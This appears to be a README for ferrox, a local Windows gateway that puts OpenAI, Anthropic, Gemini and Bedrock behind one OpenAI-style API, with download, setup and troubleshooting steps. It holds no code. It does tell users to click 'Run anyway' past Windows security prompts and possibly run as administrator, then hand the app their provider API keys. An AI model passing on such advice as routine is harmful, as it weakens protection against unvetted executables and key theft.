ferrox is a local API gateway for large language model services. It sits between your app and providers like OpenAI, Anthropic, Google Gemini, and AWS Bedrock.
It gives you one OpenAI-style HTTP API surface, so you can point tools and apps at one place instead of changing each provider setup by hand.
It runs on Windows and is built to stay light, fast, and simple to operate.
- Open the ferrox releases page.
- Find the latest release.
- Download the Windows file from the Assets list.
- Save the file to a folder you can reach, such as Downloads or Desktop.
- If the file is a ZIP, extract it first.
- If the file is an EXE, double-click it to run.
Visit the ferrox releases page
- Download the latest Windows release from the link above.
- If the download is a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Look for the main app file. This may be named
ferrox.exeor a similar Windows app file. - Double-click the file to start ferrox.
- If Windows shows a security prompt, choose Run or More info, then Run anyway if you trust the source.
- Keep the app window open while you use it.
If you move the file later, run it from the new folder the same way.
ferrox helps you manage several LLM providers through one gateway. That means:
- one place to send requests
- one API shape for your tools
- less setup for each app
- easier switching between providers
- a simple path for local and team use
It works like a proxy in front of provider APIs. Your apps talk to ferrox, and ferrox talks to the provider you choose.
- connect apps to OpenAI-style endpoints
- route requests to Anthropic, Gemini, or Bedrock
- keep one common API format
- reduce repeated setup in each app
- use a single front door for LLM traffic
- support a setup that can grow across machines
After you open ferrox, set up your provider details in the app or config file used by your release.
Typical setup steps:
- Add your provider API keys.
- Choose the provider you want to use.
- Set the local address ferrox should listen on.
- Save the settings.
- Start the gateway.
- Point your app to the ferrox endpoint.
A common local address may look like:
http://localhost:8080http://127.0.0.1:8080
If your release uses a config file, place it in the same folder as the app unless the release notes say otherwise.
ferrox is designed to sit in front of:
- OpenAI
- Anthropic
- Google Gemini
- AWS Bedrock
You can use it as a single entry point and let it handle the provider layer behind the scenes.
Your app sends an OpenAI-compatible request to ferrox.
ferrox checks the request, routes it to the right provider, and returns the response in a format your app can use.
This setup helps when you want:
- one endpoint for many models
- less provider-specific code
- a cleaner setup for local testing
- a small layer between your app and the provider
For a smooth Windows install, use:
- Windows 10 or Windows 11
- 64-bit system
- Internet access for provider calls
- Enough free disk space for the app and logs
- Permission to run files from your chosen folder
If you use antivirus or corporate security tools, they may ask for approval the first time you run the app.
To keep things simple:
- Create a folder named
ferroxin your Documents or Desktop folder. - Put the downloaded file there.
- Extract the ZIP if needed.
- Keep config files in the same folder.
- Leave the app file in place so shortcuts keep working.
A clean folder makes updates and backups easier.
Before you start using ferrox, check these items:
- You downloaded the latest release
- You extracted the files if needed
- You opened the app file from the correct folder
- Your provider API key is saved
- Your app points to the ferrox local address
- Your firewall allows local app traffic if needed
If you have a tool that already works with OpenAI-style APIs, you can change its base URL to ferrox.
Example idea:
- old endpoint: provider API directly
- new endpoint: ferrox local endpoint
Then your tool sends requests to ferrox, and ferrox sends them to the provider you set.
This is useful when you want to switch models without changing every app setting.
Open your settings or config file and switch from one provider to another. Keep the same app endpoint.
If you change a key or route, close ferrox and open it again.
If the release includes logs, open them to see request details, startup status, and error messages.
Store API keys only in the config or settings file used by ferrox. Do not paste them into chats or public files.
Your folder may look like this:
ferrox.execonfig.jsonlogsREADME.md
Some releases may use a different layout. Use the files included in the release package.
ferrox runs as a local gateway, so Windows may show a network prompt the first time it starts.
If that happens:
- Check that the app name matches ferrox.
- Allow access on your private network if you use it on one machine.
- Keep public network access off unless you need it.
This helps local apps talk to ferrox without trouble.
Use short, clear settings names when you edit config files.
Good habits:
- keep one config backup
- change one setting at a time
- restart after edits
- keep the local port the same if your other app already uses it
If a setting is not clear, try the default value first.
- Check that the file finished downloading
- Extract the ZIP file first if needed
- Right-click the file and choose Run as administrator if your setup needs it
- Make sure Windows did not block the file
- Confirm the local address and port
- Make sure ferrox is still running
- Check the firewall prompt
- Make sure your other app uses the ferrox endpoint, not the original provider endpoint
- Check the API key for typos
- Confirm the correct provider is selected
- Make sure the provider account is active
- Restart ferrox after changes
- Verify the provider service is available
- Check your local network
- Review logs if they are included
- Try a different model or route
When a new release is out:
- Visit the ferrox releases page.
- Download the newest Windows file.
- Close the old app first.
- Replace the old files with the new ones.
- Open the updated app.
- Check your config after the update.
Keep a copy of your config file before replacing anything.
- people who want one LLM API endpoint
- users who switch between providers
- teams that need a shared gateway
- apps that already speak OpenAI-style API
- Windows users who want a local middle layer
anthropic, api-gateway, aws-bedrock, gemini, high-performance, llm, openai, openai-compatible, proxy, rust